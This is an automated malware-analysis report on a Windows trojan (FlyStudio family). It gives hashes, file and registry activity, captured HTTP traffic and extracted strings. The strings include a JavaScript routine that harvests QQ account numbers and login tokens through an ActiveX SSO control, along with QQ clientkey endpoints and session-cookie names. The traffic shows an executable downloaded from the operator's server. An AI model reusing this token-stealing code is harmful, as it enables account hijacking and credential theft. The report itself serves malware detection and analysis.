Trojan.Win32.FlyStudio_36f49424fb

by malwarelabrobot on November 7th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 36f49424fb426f479c75454e81909b54
SHA1: 3bb81b3feed2d3e82a28cd58059abbea8561520d
SHA256: b7dd99ff0a2108aa377b44fdc9b4635521c56a964fad04148f095d8d72a97f4e
SSDeep: 49152:0N47WOtQeS49t6KvsFaknFjDAp9pYrkAKXGwcxzV:0GiIjF8XFXnFv29okfXGzD
Size: 1622528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Guco
Created at: 2017-10-18 05:00:56
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

Bugreport.dll:512
%original file name%.exe:2060

The Trojan injects its code into the following process(es):

%original file name%.exe:3796

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Bugreport.dll:512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\data\Bugreport.ini (48 bytes)
C:\data\Bugreport_error.ini (1693 bytes)

The process %original file name%.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\%original file name%.exe (1 bytes)

The process %original file name%.exe:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S09T3NA0.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\JR6VY9G6.txt (409 bytes)
C:\data\Gutou.ini (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YAACNF8Y.txt (130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\stat[1].htm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\core[1].js (765 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\icon_11[1].gif (913 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tongji[1].htm (952 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\X3F62G2R.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\17287617[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\pic[1].gif (719 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D9YRB8N4.txt (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HMGGW7AX.txt (261 bytes)
C:\data\Bugreport.ini (27 bytes)
C:\data\Bugreport.dll (629 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\stat[1].js (2459 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HMGGW7AX.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D9YRB8N4.txt (0 bytes)

Registry activity

The process %original file name%.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
8bc70aaf699e21c985160a25d0d0610e c:\%original file name%.exe
2aeb3f3b00d097cae1c0d3fd7a84cef1 c:\data\Bugreport.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address    Virtual Size    Raw Size    Entropy    Section MD5
UPX0    4096               2433024         0           0          d41d8cd98f00b204e9800998ecf8427e
UPX1    2437120            1601536         1600000     5.46928    35e9bac95f24f4dc90b923386b4415e6
.rsrc   4038656            24576           21504       3.69233    38849d5969841e626ed900a510f647b7

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /stat.htm?id=1252975436&r=&lg=en-us&ntime=none&cnzz_eid=178159016-1509931833-&showp=1276x846&p=http://VVV.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&t=tongji&umuuid=15f8f3646922f9-0e935720d5fc1f-44703d1f-1078c8-15f8f36469329c&h=1&rnd=525356111 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: z5.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 06 Nov 2017 02:43:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip


GET /公共软件下载/秒评秒赞.txt HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: zh-cn
Referer: hXXp://d.gutousoft.com/公共软件下载/秒评秒赞.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d.gutousoft.com


HTTP/1.1 200 OK
Date: Mon, 06 Nov 2017 02:43:05 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17
Last-Modified: Sat, 04 Nov 2017 01:56:52 GMT
ETag: "202-55d1e88ffc203"
Accept-Ranges: bytes
Content-Length: 514
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
..........12.5.3..(....................)..............hXXp://d.gutousoft.com/公共软件下载/骨头批量QQ空间动态秒评秒赞助手.exe..hXXp://bubusoft.dbankcloud.com/QQ动态批量赞/骨头批量QQ空间动态秒评秒赞助手.exe..............................!....

<<< skipped >>>

GET /app.gif?&cna=XbqGEj8 TRoCAcLyYNp RQAT HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com


HTTP/1.1 200 OK
Date: Mon, 06 Nov 2017 02:43:43 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=XbqGEj8 TRoCAcLyYNp RQAT; expires=Thu, 04-Nov-27 02:43:43 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache


GET /kss_api/api.php?a=uplog&apiver=903&c=0&gdata=1&softcode=1000004&x=5099672 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0  (compatible; MSiE 6.0; Windows NT 5.1;)
Accept-Encoding: gzip, deflate
Host: vip2.gutou.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 06 Nov 2017 02:43:35 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=6ddf4ad5b296bce372bf72c92aa5c0ae; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 151
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
kssdata0:|:1:|:hXXp://d1.gutousoft.com/GTPLQQKJDTMPMZZS.htm:|:[2017-07-21]......QQ...............................................................:|::|:


GET / HTTP/1.1
Accept: */*
Referer: hXXp://vip.gutou.cc
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: vip.gutou.cc
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: hXXp://gutou.cc/sale.php
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=psc3samlk07fcqbemes0hbc7q7; path=/
X-Powered-By: ASP.NET
Date: Mon, 06 Nov 2017 02:43:27 GMT
Connection: close
Content-Length: 0


GET /9.gif?abc=1&rnd=431348710 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Mon, 06 Nov 2017 02:43:41 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=XbqGEj8 TRoCAcLyYNp RQAT; expires=Thu, 04-Nov-27 02:43:41 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=e6f0756b; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=ea5a02159f313a5c8fb07244_1509936221_1; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=XbqGEj8 TRoCAcLyYNp RQAT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache


GET /17287617.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1969
Content-Type: application/x-javascript
Last-Modified: Fri, 03 Nov 2017 07:01:34 GMT
Accept-Ranges: bytes
ETag: "268f14967154d31:65d0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 06 Nov 2017 02:43:42 GMT
Connection: close

GET /icon_11.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: icon.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 913
Content-Type: image/gif
Last-Modified: Fri, 26 May 2006 14:21:40 GMT
Accept-Ranges: bytes
ETag: "0f268b4cf80c61:978"
Server: Microsoft-IIS/6.0
Date: Mon, 06 Nov 2017 02:43:47 GMT
Connection: close


GET / HTTP/1.1
Accept: */*
Referer: hXXp://y.gutousoft.com
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: y.gutousoft.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Mon, 06 Nov 2017 02:43:27 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5197a1d146102a5aafb305106aeb4c21; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: hXXp://gutou.cc/sale.php
Content-Length: 0
Content-Type: text/html;charset=utf-8


GET /img/pic.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: icon.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: image/gif
Content-Length: 719
Connection: keep-alive
Date: Sun, 05 Nov 2017 11:30:41 GMT
Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT
Expires: Mon, 06 Nov 2017 11:30:41 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Via: cache4.l2et15-1[10,304-0,C], cache29.l2et15-1[6,0], kunlun7.cn74[0,200-0,H], kunlun10.cn74[0,0]
Age: 54780
X-Cache: HIT TCP_MEM_HIT dirn:8:81051424 mlen:-1
X-Swift-SaveTime: Sun, 05 Nov 2017 11:30:41 GMT
X-Swift-CacheTime: 86400
Timing-Allow-Origin: *
EagleId: deba31a315099362219848965e

GET /公共软件下载/骨头批量QQ空间动态秒评秒赞助手.exe HTTP/1.1
Host: d.gutousoft.com
Accept: */*
Referer: hXXp://d.gutousoft.com/公共软件下载
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 200 OK
Date: Mon, 06 Nov 2017 02:43:06 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17
Last-Modified: Sat, 04 Nov 2017 01:56:42 GMT
ETag: "18d800-55d1e886898fb"
Accept-Ranges: bytes
Content-Length: 1628160
Connection: close
Content-Type: application/x-msdownload

GET /up/tongji.htm HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.gutou.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 06 Nov 2017 02:43:36 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17
Last-Modified: Sat, 04 Jul 2015 23:52:47 GMT
ETag: "3b8-51a155e94d1c0"
Accept-Ranges: bytes
Content-Length: 952
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

GET /core.php?web_id=1252975436&show=pic&t=z HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 765
Connection: keep-alive
Date: Mon, 06 Nov 2017 02:39:47 GMT
Last-Modified: Mon, 06 Nov 2017 02:39:47 GMT
Expires: Mon, 06 Nov 2017 02:54:47 GMT
Via: cache19.l2et15[0,200-0,H], cache6.l2et15[0,0], kunlun4.cn250[0,200-0,H], kunlun2.cn250[0,0]
Age: 233
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2 mlen:-1
X-Swift-SaveTime: Mon, 06 Nov 2017 02:41:04 GMT
X-Swift-CacheTime: 823
Timing-Allow-Origin: *
EagleId: 7ae44a8915099362207752615e

GET /stat.php?id=1252975436&show=pic HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: s23.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10990
Connection: keep-alive
Date: Mon, 06 Nov 2017 01:30:33 GMT
Last-Modified: Mon, 06 Nov 2017 01:30:33 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache2.l2et15[0,200-0,H], cache13.l2et15[0,0], kunlun5.cn133[0,200-0,H], kunlun8.cn133[5,0]
Age: 4386
X-Cache: HIT TCP_MEM_HIT dirn:10:822723752 mlen:-1
X-Swift-SaveTime: Mon, 06 Nov 2017 01:42:55 GMT
X-Swift-CacheTime: 4658
Timing-Allow-Origin: *
EagleId: ab6f9ac815099362193695898e

GET /go.asp?svid=11&id=17287617&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://VVV.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&vvtime=1509936221385 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.gutou.cc/up/tongji.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: web.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 06 Nov 2017 02:43:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05 Nov 2017 10:03:17 GMT
Cache-control: private


The Trojan connects to the servers at the following location(s):

%original file name%.exe_3796:

`.rsrc
kernel32.dll
advapi32.dll
wininet.dll
oleaut32.dll
Kernel32.dll
atl.dll
ole32.dll
shlwapi.dll
user32.dll
data\lz.dll
data\uu.dll
data\dc.dll
dbghelp.dll
ntdll.dll
gdiplus.dll
GdiPlus.dll
Ole32.dll
GetProcessHeap
RegOpenKeyA
RegEnumKeyA
RegCloseKey
RegOpenKeyExA
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
uu_loginA
ReportError
uu_reportError
SetWindowsHookExA
UnhookWindowsHookEx
EnumWindows
GdiplusShutdown
CreateIoCompletionPort
{B6F7542F-B8FE-46a8-9605-98856A687097}
42305932-06E6-47a5-AC79-8BDCDC58DF61
HttpClient
1970-1-1 00:00:01
001A2B3C4D5Ec:\kss.ini
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
ServiceName\\.\
2u.eKITFBp
hXXp://y.gutousoft.com/sale.php#tag41
(*.bmp;*.dib;*.jpg;*.jpg;*.jpeg;*.jpe;*.jfif;*.gif;*.tif;*.tiff;*.png)|*.bmp;*.dib;*.jpg;*.jpeg;*.jpe;*.jfif;*.gif;*.tif;*.tiff;*.png|GIF
(*.gif;*.tif;*.tiff)|*.gif;*.tif;*.tiff|PNG
(*.png)|*.png|JPG
(*.jpg;*.jpeg;*.jpe;*.jfif)|*.jpeg;*.jpe;*.jfif|BMP
(*.bmp;*.dib)|*.bmp;*.dib|
(*.*)|*.*
12.5.3
hXXp://d.gutousoft.com/公共软件下载/秒评秒赞.txt
hXXp://
sale.php?
sale.php#
hXXp://vip.gutou.cc
vip.gutou.cc
hXXps://
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
@https
hXXp://y.gutousoft.com
y.gutousoft.com
\data\error.ini
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=http://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=
&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
hXXp://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.
nickname
hXXp://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=
clientkey=
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
pgv_pvi=; pgv_si=; _qpsvr_localtk=; pgv_pvid=; pgv_info=ssid=; pt2gguin=; uin=; skey=; ptisp=; RK=; ptcz=; p_uin=; p_skey=; pt4_token=; Loading=; QZ_FE_WEBP_SUPPORT=; cpu_performance_v8=
hXXp://user.qzone.qq.com/
hXXp://user.qzone.qq.com/88882222
.substr(
hXXp://qzone.qq.com/
location = 'url'
hXXps://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msgdetail_v6?uin=
hXXp://h5.qzone.qq.com/proxy/domain/taotao.qzone.qq.com/cgi-bin/emotion_cgi_delcomment_ugc?g_tk=
qzreferrer=http://user.qzone.qq.com/
hXXps://h5.qzone.qq.com/proxy/domain/ic2.qzone.qq.com/cgi-bin/feeds/cgi_get_feeds_count.cgi?uin=
,nick:'
login
skey=
p_skey=
; skey=
hXXps://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=
msglist
&scope=0&view=1&daylist=&uinlist=&gid=&flag=1&filter=all&applist=all&refresh=0&aisortEndTime=0&aisortOffset=0&getAisort=0&aisortBeginTime=0&pagenum=1&externparam=&firstGetGroup=0&icServerTime=0&mixnocache=0&scene=0&begintime=0&count=10&dayspac=0&sidomain=qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&rd=0.
hXXps://h5.qzone.qq.com/proxy/domain/ic2.qzone.qq.com/cgi-bin/feeds/feeds3_html_more?uin=
nickname:'
data-curkey=\x22
data-unikey=\x22
key:'
0000000
hXXp://user.qzone.qq.com/
&curkey=
&unikey=
hXXp://h5.qzone.qq.com/proxy/domain/w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
p_skey
hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA5NDc0MF80MzUxMjhfODAwMDk0NzQwXzJf
\data\yzm.jpg
hXXp://m.gutousoft.com/yzm/getsoft.php
\data\lz.dll
.text
`.rdata
@.data
.rsrc
@.reloc
NETAPI32.dll
MFC42.DLL
MSVCRT.dll
KERNEL32.dll
USER32.dll
SHLWAPI.dll
WININET.dll
FastVerCode.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
.PAVCInternetException@@
Content-Disposition: form-data; name="key"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN)
POST /api.php?mod=yzm&act=state HTTP/1.1
/api.php?mod=yzm&act=state
LZConfig.ini
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
HTTP/1.1
/api.php?mod=yzm&act=add
POST /api.php?mod=yzm&act=result HTTP/1.1
/api.php?mod=yzm&act=result
